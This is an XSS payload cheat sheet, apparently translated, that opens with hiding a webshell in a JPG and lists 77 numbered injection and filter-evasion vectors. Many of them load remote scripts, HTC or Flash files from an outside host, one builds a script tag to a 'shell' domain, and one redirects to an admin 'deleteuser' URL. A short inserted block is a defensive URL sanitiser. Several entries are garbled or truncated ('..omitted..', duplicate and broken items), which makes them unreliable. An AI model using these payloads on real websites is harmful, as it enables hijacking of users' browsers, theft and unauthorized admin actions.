Cross-site image shell

XSS (cross-site) code: <script>alert("")</script>

Put the code on the first line of the webshell, change the webshell to JPG image format, and when the image-format webshell is visited, our webshell still executes.
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line injected JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character-count limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters basically have no effect domestically, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">
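As an added example (not part of the original post), this is the check a defender puts on URL-valued attributes such as IMG SRC: it normalises the value roughly the way a browser does (entity decoding, then stripping the control characters and whitespace that items 11-14 and 19 rely on), case-folds the scheme as item 4 requires, and then allows only http(s) or relative URLs instead of looking for the substring "javascript". The vectors it runs against are constructed here from items 3-19 and 40; the entity encodings that items 8 and 10 leave "..omitted.." are reconstructed as an assumption.

```javascript
// Added example (not the post's code): normalise a URL-valued attribute the way a
// browser does before it looks at the scheme, then allow only http(s)/relative URLs.

const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };

// Single pass over &#NNN / &#xHH (semicolon optional) and a few named entities.
function decodeEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|\d+);?|&(amp|lt|gt|quot|apos);/gi, (m, num, name) => {
    if (name) return NAMED[name.toLowerCase()];
    const n = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return n <= 0x10ffff ? String.fromCodePoint(n) : '\ufffd';
  });
}

// URL parsers trim leading/trailing C0 controls and spaces and drop TAB/LF/CR
// anywhere inside the string, which is exactly what lets "jav\tascript:" run.
function normalizeUrl(raw) {
  return decodeEntities(String(raw))
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}

const ALLOWED_SCHEMES = new Set(['http', 'https']);
// True only for http(s) or scheme-less (relative) URLs. Protocol-relative
// "//host/..." passes: this is a scheme check, not a host allowlist.
function isSafeUrl(raw) {
  const m = /^([^\/?#]*):/.exec(normalizeUrl(raw));
  return m ? ALLOWED_SCHEMES.has(m[1].toLowerCase()) : true;
}

// Constructed vectors from the items above (items 8/10 entity forms reconstructed), with the verdict a filter should give.
const VECTORS = [
  ["javascript:alert('XSS')", false],                                        // item 3
  ["JaVaScRiPt:alert('XSS')", false],                                        // item 4
  ["&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", false], // item 8
  ["&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')", false],       // item 10
  ["jav\tascript:alert('XSS');", false],                                     // item 11
  ["jav&#x0A;ascript:alert('XSS');", false],                                 // item 13
  [" javascript:alert('XSS');", false],                                      // item 19
  ['vbscript:msgbox("XSS")', false],                                         // item 40
  ["http://3w.org/XSS/xss.js", true],
  ["a.php?next=javascript:alert(1)", true],  // the only colon is inside the query
];

function auditVectors() {
  return VECTORS.map(([v, expected]) => isSafeUrl(v) === expected);
}

console.log(auditVectors().every(Boolean) ? 'all vectors classified as expected' : 'MISMATCH');
```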
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted before the JavaScript (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by a letter is enough)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded commands; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP address as a decimal number
<A HREF="http://3232235521">XSS</A>

(71) IP address in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP address in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>